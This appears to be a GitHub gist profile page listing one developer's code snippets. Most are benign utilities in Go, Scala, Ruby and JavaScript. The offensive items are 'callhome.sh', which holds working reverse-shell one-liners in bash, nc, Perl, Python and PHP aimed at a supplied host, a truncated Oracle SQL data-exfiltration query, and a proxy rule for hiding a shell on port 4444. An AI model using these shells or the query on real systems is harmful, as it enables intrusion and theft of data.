Skip to content

Instantly share code, notes, and snippets.

Avatar

Chris Frohoff frohoff

  • San Diego, CA
View GitHub Profile
View oracle_chunked_xml_exfil.sql
select c from (
select cast(dbms_lob.substr(t.c, 4000, (n.i) * 4000 + 1) as varchar(4000)) c, t.r i, n.i j
from ((
select rownum r, dbms_lob.getlength(c) l, c
from (
select dbms_xmlgen.getxml('select * from all_tables') c
from dual)
) t inner join (
select rownum - 1 as i
from dual
@frohoff
frohoff / print_rails_cookie.sh
Last active Dec 15, 2015
print contents of rails cookie
View print_rails_cookie.sh
View rails_cookie_rce.rb
@frohoff
frohoff / callhome.sh
Last active Oct 26, 2020
Shell script that attempts multiple methods for creating a reverse shell
View callhome.sh
#!/bin/bash
host=$1
port=$2
bash -i >& /dev/tcp/$host/$port 0>&1
nc -e /bin/sh $host $port
perl -e "use Socket;\$i=\"$host\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$host\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
php -r "\$sock=fsockopen(\"$host\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");"
View hide-shell.rb
proxy do |data|
{ :remote =>
data =~ /(GET|POST|HEAD|PUT|DELETE|OPTIONS|TRACE|CONNECT|PATCH) / ?
"localhost:81" :
"localhost:4444"
}
end
View gogrep.go
package main
import (
"fmt"
"os"
"bufio"
"regexp"
"io"
)
@frohoff
frohoff / longchaintest.js
Last active Aug 29, 2015
long stream chain test
View longchaintest.js
var crypto = require('crypto')
var hashType = process.argv[2] || 'sha1'
var numHashes = parseInt(process.argv[3] || 1)
// init chain with stdout
var piped = process.stdout
for (var i = 0; i < numHashes; i++) {
// prepend chain with new hash
View nullsafe.scala
object NullSafeConversions {
implicit def ns[A](a:A) = new NullSafe(a)
implicit def ro[A](o:Option[A]) = new RichOption(o)
def ?[A](a:A) = if (a == null) Some(a) else None
case class NullSafe[A](a:A) extends AnyVal {
def ?[B >: Null](f: A => B):B = if (a != null) f(a) else null
}
case class RichOption[A](o:Option[A]) extends AnyVal {
@frohoff
frohoff / terse-rc4.rb
Last active Aug 29, 2015
terse ruby rc4 (161 chars, 154 chars not counting proc/param overhead) for https://twitter.com/matthew_d_green/status/524966294492577792
View terse-rc4.rb
->t,k{s=*0..255;j=0;m=256;m.times{|i|j=(j+s[i]+k[i%k.size])%m;s[i],s[j]=s[j],s[i]};i=j=0;t.map{|b|i=(i+1)%m;j=(j+s[i])%m;s[i],s[j]=s[j],s[i];b^s[(s[i]+s[j])%m]}}
@frohoff
frohoff / Flow.scala
Last active Aug 29, 2015
monadish reactive flow combinators
View Flow.scala
package org.frohoff.flow
import scala.collection.mutable.Buffer
import Flow._
object Test extends App {
val f: Flow[Int,Int] = Flow[Int]
val f2: Flow[Int,String] = f.map(_.toHexString)
val f3: Flow[Int,Option[Int]] = f.map(Option(_))
//f3.flatten // doesn't compile yet